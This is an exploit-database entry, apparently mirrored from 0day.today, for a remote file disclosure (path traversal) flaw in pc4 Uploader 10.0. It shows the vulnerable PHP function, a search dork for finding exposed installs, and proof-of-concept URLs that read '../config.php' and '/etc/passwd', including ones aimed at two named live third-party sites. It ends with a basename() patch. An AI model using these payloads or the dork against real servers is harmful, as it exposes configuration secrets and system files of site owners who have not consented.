Search...

pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability

2009-06-22T00:00:00

ID 1337DAY-ID-5391
Type zdt
Reporter Qabandi
Modified 2009-06-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
pc4 Uploader &lt;= 10.0 Remote File Disclosure Vulnerability
=========================================================


=Vuln:		pc4arb - pc4 Uploader &lt;= 10.0 Remote File Disclosure Vulnerability
=INFO:		http://pc4arb.com/article-48.html
=BUY:  		~~~
=Download:      ~~~
=DORK:		intext:"Pictures of Whale Penis"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

none

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./pc4uploader/upfiles/index.php"

function displayimage( $fn, $lastMod, $fs )
{
    global $out_Types;
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" ); &lt;-----------------------------//opens $fn with no filtering or precautions taken
    if ( function_exists( fpassthru ) )
    {
        fpassthru( $fp );
    }
    else
    {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}

// Function displayimage() is later called

$file = $_GET['file']; &lt;---------------------------------// again, not filtered or anything.
//..
//..
//..
//..
    displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````

http://localhost/pc4uploader/upfiles/index.php?file=../config.php
http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd

demo:

http://upload.traidnt.net/upfiles/index.php?file=../config.php
{Save File to view the code if needed}

http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
{view source}



---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````

//Use this displayimage() function instead, notice the changes..

function displayimage( $fn, $lastMod, $fs )
{
    global $out_Types;
    $fn = basename($fn); 
    $ext = explode( ".", $fn );
    $ext_i = count( $ext ) - 1;
    $file_ext = $ext[$ext_i];
    header( "Last-Modified: ".$lastMod );
    header( "ETag: ".getetag( $fn ) );
    header( "Accept-Ranges: bytes" );
    header( "Content-Length: ".$fs );
    header( "Content-Type: ".$out_Types[$file_ext] );
    $fp = fopen( $fn, "rb" );
    if ( function_exists( fpassthru ) )
    {
        fpassthru( $fp );
    }
    else
    {
        $temp = fread( $fp, $fs );
        echo $temp;
    }
    fclose( $fp );
    return;
}

//I added    $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
// since config.php doesent exist the script will do the rest by giving a safe error,
// also move ./include/default.gif to ./upfiles/default.gif
// everything should be good :)




#  0day.today [2018-03-19]  #

JSON Vulners Source

Initial Source

{"published": "2009-06-22T00:00:00", "id": "1337DAY-ID-5391", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-03-19T05:24:28", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220191505", "OPENVAS:1361412562311220191512"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1512.NASL", "SUSE_SU-2019-0672-1.NASL", "REDHAT-RHSA-2018-3586.NASL", "REDHAT-RHSA-2018-3590.NASL", "REDHAT-RHSA-2018-3459.NASL", "VIRTUOZZO_VZA-2018-075.NASL", "REDHAT-RHSA-2018-3540.NASL", "HP_IMC_DBMAN_MULTI_VULNS_HPESBHF03930.NASL", "EULEROS_SA-2019-1505.NASL", "SUSE_SU-2019-0645-1.NASL"]}, {"type": "redhat", "idList": ["RHSA-2018:3459", "RHSA-2018:3586", "RHSA-2018:3590", "RHSA-2018:3540", "RHSA-2018:2925"]}], "modified": "2018-03-19T05:24:28", "rev": 2}, "vulnersScore": 1.0}, "type": "zdt", "lastseen": "2018-03-19T05:24:28", "edition": 2, "title": "pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability", "href": "https://0day.today/exploit/description/5391", "modified": "2009-06-22T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/5391", "references": [], "reporter": "Qabandi", "sourceData": "=========================================================\r\npc4 Uploader <= 10.0 Remote File Disclosure Vulnerability\r\n=========================================================\r\n\r\n\r\n=Vuln:\t\tpc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability\r\n=INFO:\t\thttp://pc4arb.com/article-48.html\r\n=BUY: \t\t~~~\r\n=Download: ~~~\r\n=DORK:\t\tintext:\"Pictures of Whale Penis\"\r\n\r\n ____________\r\n _-=/:Conditions:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\nnone\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n _________________\r\n _-=/:Vulnerable_Code:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n// in \"./pc4uploader/upfiles/index.php\"\r\n\r\nfunction displayimage( $fn, $lastMod, $fs )\r\n{\r\n global $out_Types;\r\n $ext = explode( \".\", $fn );\r\n $ext_i = count( $ext ) - 1;\r\n $file_ext = $ext[$ext_i];\r\n header( \"Last-Modified: \".$lastMod );\r\n header( \"ETag: \".getetag( $fn ) );\r\n header( \"Accept-Ranges: bytes\" );\r\n header( \"Content-Length: \".$fs );\r\n header( \"Content-Type: \".$out_Types[$file_ext] );\r\n $fp = fopen( $fn, \"rb\" ); <-----------------------------//opens $fn with no filtering or precautions taken\r\n if ( function_exists( fpassthru ) )\r\n {\r\n fpassthru( $fp );\r\n }\r\n else\r\n {\r\n $temp = fread( $fp, $fs );\r\n echo $temp;\r\n }\r\n fclose( $fp );\r\n return;\r\n}\r\n\r\n// Function displayimage() is later called\r\n\r\n$file = $_GET['file']; <---------------------------------// again, not filtered or anything.\r\n//..\r\n//..\r\n//..\r\n//..\r\n displayimage( $file, \"Thu, 01 Jan 2006 12:00:00 GMT\", $fs );\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n _______\r\n _-=/:P.o.C:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\nhttp://localhost/pc4uploader/upfiles/index.php?file=../config.php\r\nhttp://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd\r\n\r\ndemo:\r\n\r\nhttp://upload.traidnt.net/upfiles/index.php?file=../config.php\r\n{Save File to view the code if needed}\r\n\r\nhttp://uploader.pc4arb.com/upfiles/index.php?file=../config.php\r\n{view source}\r\n\r\n\r\n\r\n---------------------------------------===--------------------------------------\r\n\r\n __________\r\n _-=/:SOLUTION:\\=-_\r\n````````````````````````````````````````````````````````````````````````````````\r\n\r\n//Use this displayimage() function instead, notice the changes..\r\n\r\nfunction displayimage( $fn, $lastMod, $fs )\r\n{\r\n global $out_Types;\r\n $fn = basename($fn); \r\n $ext = explode( \".\", $fn );\r\n $ext_i = count( $ext ) - 1;\r\n $file_ext = $ext[$ext_i];\r\n header( \"Last-Modified: \".$lastMod );\r\n header( \"ETag: \".getetag( $fn ) );\r\n header( \"Accept-Ranges: bytes\" );\r\n header( \"Content-Length: \".$fs );\r\n header( \"Content-Type: \".$out_Types[$file_ext] );\r\n $fp = fopen( $fn, \"rb\" );\r\n if ( function_exists( fpassthru ) )\r\n {\r\n fpassthru( $fp );\r\n }\r\n else\r\n {\r\n $temp = fread( $fp, $fs );\r\n echo $temp;\r\n }\r\n fclose( $fp );\r\n return;\r\n}\r\n\r\n//I added $fn = basename($fn);, it will convert anything like \"../../config.php\" to \"config.php\"\r\n// since config.php doesent exist the script will do the rest by giving a safe error,\r\n// also move ./include/default.gif to ./upfiles/default.gif\r\n// everything should be good :)\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-19] #"}

pc4 Uploader &lt;= 10.0 Remote File Disclosure Vulnerability

Description

Exploit for unknown platform in category web applications

pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability